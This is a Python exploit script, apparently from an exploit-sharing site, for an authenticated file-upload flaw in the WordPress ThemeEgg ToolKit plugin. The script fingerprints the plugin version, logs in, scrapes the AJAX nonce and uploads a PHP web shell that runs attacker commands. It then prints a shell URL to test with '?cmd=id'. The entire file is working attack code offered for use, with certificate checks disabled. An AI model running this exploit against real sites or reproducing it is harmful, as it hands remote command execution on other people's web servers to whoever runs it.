## https://sploitus.com/exploit?id=1337DAY-ID-39947
import argparse
import re
import time
import requests
from bs4 import BeautifulSoup
#by Nxploit | Khaled Alenazi
# Module-wide HTTP client shared by every function below. Certificate
# verification is switched off for all requests made through it, and the
# InsecureRequestWarning that urllib3 would otherwise emit is silenced.
session = requests.Session()
session.verify = False
requests.packages.urllib3.disable_warnings()
def display_banner():
    """Print the ASCII-art banner and author credit to stdout. Returns None."""
    print("""
..######..##.....##.########..........#######....#####....#######..########..........#######...#######...#######.....##...########
.##....##.##.....##.##...............##.....##..##...##..##.....##.##...............##.....##.##.....##.##.....##..####...##......
.##.......##.....##.##......................##.##.....##........##.##......................##.##.....##.##.....##....##...##......
.##.......##.....##.######...#######..#######..##.....##..#######..#######..#######..#######...#######...########....##...#######.
.##........##...##..##...............##........##.....##.##..............##.........##........##.....##........##....##.........##
.##....##...##.##...##...............##.........##...##..##........##....##.........##........##.....##.##.....##....##...##....##
..######.....###....########.........#########...#####...#########..######..........#########..#######...#######...######..######.
Exploit by : Khaled Alenazi ,Nxploit
""")
def check_version(url):
    """Fingerprint the plugin version from its publicly readable readme.txt.

    Issues a GET for ``<url>/wp-content/plugins/themeegg-toolkit/readme.txt``
    (a request a WAF or web-server log can key on) and reads the
    ``Stable tag`` line. The tag is compared against ``"1.2.9"`` as a plain
    string, not as a numeric version.

    Returns True when a tag was found and compares <= "1.2.9"; otherwise
    prints a not-vulnerable message and returns False.
    """
    readme_url = f"{url}/wp-content/plugins/themeegg-toolkit/readme.txt"
    resp = requests.get(readme_url, headers={"User-Agent": "Mozilla/5.0"}, verify=False)
    tag = None
    if resp.status_code == 200:
        tag = re.search(r'Stable tag: (\d+\.\d+\.\d+)', resp.text)
    if tag and tag.group(1) <= "1.2.9":
        print(f"[+] Vulnerable version detected: {tag.group(1)}")
        time.sleep(3)
        return True
    print("[-] The target does not appear to be vulnerable.")
    return False
def login(url, username, password, session):
    """POST the credentials to ``<url>/wp-login.php`` through *session*.

    Success is judged solely by the cookie jar afterwards containing a cookie
    whose name includes ``wordpress_logged_in``; the response body and status
    are not inspected.

    Returns True on an apparent login, False otherwise.
    """
    form = {
        "log": username,
        "pwd": password,
        "rememberme": "forever",
        "wp-submit": "Log In",
    }
    session.post(f"{url}/wp-login.php", data=form, headers={"User-Agent": "Mozilla/5.0"}, verify=False)
    cookie_names = (c.name for c in session.cookies)
    return any("wordpress_logged_in" in name for name in cookie_names)
def get_security_nonce(url, session):
    """Scrape the plugin's ``ajax_nonce`` value from its settings page.

    GETs ``<url>/wp-admin/themes.php?page=themeegg-toolkit`` with the
    authenticated *session*, parses the HTML and scans every <script>
    element for a ``"ajax_nonce":"..."`` pair.

    Returns the first nonce string found, or None when none is present.
    """
    page = session.get(f"{url}/wp-admin/themes.php?page=themeegg-toolkit", headers={"User-Agent": "Mozilla/5.0"})
    nonce_re = re.compile(r'"ajax_nonce":"(\w+)"')
    scripts = BeautifulSoup(page.text, "html.parser").find_all("script")
    hits = (nonce_re.search(tag.text) for tag in scripts)
    return next((hit.group(1) for hit in hits if hit), None)
def exploit(url, username, password):
    """Run the full chain against *url* with the supplied WordPress credentials.

    Steps, each of which aborts the run on failure:
      1. check_version()      - GET the plugin readme.txt and compare the tag.
      2. login()              - POST to wp-login.php via the module-level session.
      3. get_security_nonce() - scrape ajax_nonce from the plugin settings page.
      4. POST a multipart request to wp-admin/admin-ajax.php with
         action=TETK_import_demo_data carrying a PHP file as ``customizer_file``.

    Returns None; progress and outcome are reported with print().
    """
    if not check_version(url):
        return
    if login(url, username, password, session):
        print("[+] Logged in successfully.")
    else:
        print("[-] Failed to log in.")
        return
    nonce_value = get_security_nonce(url, session)
    if not nonce_value:
        print("[-] Failed to extract security nonce.")
        return
    print(f"[+] Found security nonce: {nonce_value}")
    shell_code = "<?php system($_GET['cmd']); ?>"
    # Multipart body: two ordinary form fields (filename None) plus one file
    # part declared as application/x-php.
    files = {
        "action": (None, "TETK_import_demo_data"),
        "security": (None, nonce_value),
        "customizer_file": ("shell.php", shell_code, "application/x-php")
    }
    upload_url = f"{url}/wp-admin/admin-ajax.php"
    print("[*] Uploading Web Shell...")
    response = session.post(upload_url, files=files, headers={"User-Agent": "Mozilla/5.0"}, verify=False)
    time.sleep(3)
    # Only the HTTP status is examined; the response body is never parsed, so
    # a 200 carrying an error payload is still reported as success.
    if response.status_code == 200:
        print("[+] Web Shell uploaded successfully!")
        # The path below is a hard-coded year/month guess, not a value read
        # back from the server's reply.
        shell_path = f"{url}/wp-content/uploads/2025/03/shell.php"
        print(f"[+] Potential Web Shell location: {shell_path}")
        print(f"[*] Test command: {shell_path}?cmd=id")
    else:
        print("[-] File upload failed. Check if you have sufficient privileges or if there are additional protections.")
if __name__ == "__main__":
    # Banner first, then argument parsing, then the run.
    display_banner()
    cli = argparse.ArgumentParser(description="Exploit for ThemeEgg ToolKit File Upload Vulnerability")
    for flags, help_text in (
        (("-u", "--url"), "Target WordPress URL (e.g., http://192.168.100.74:888/wordpress)"),
        (("-un", "--username"), "WordPress username"),
        (("-p", "--password"), "WordPress password"),
    ):
        cli.add_argument(*flags, required=True, help=help_text)
    opts = cli.parse_args()
    exploit(opts.url, opts.username, opts.password)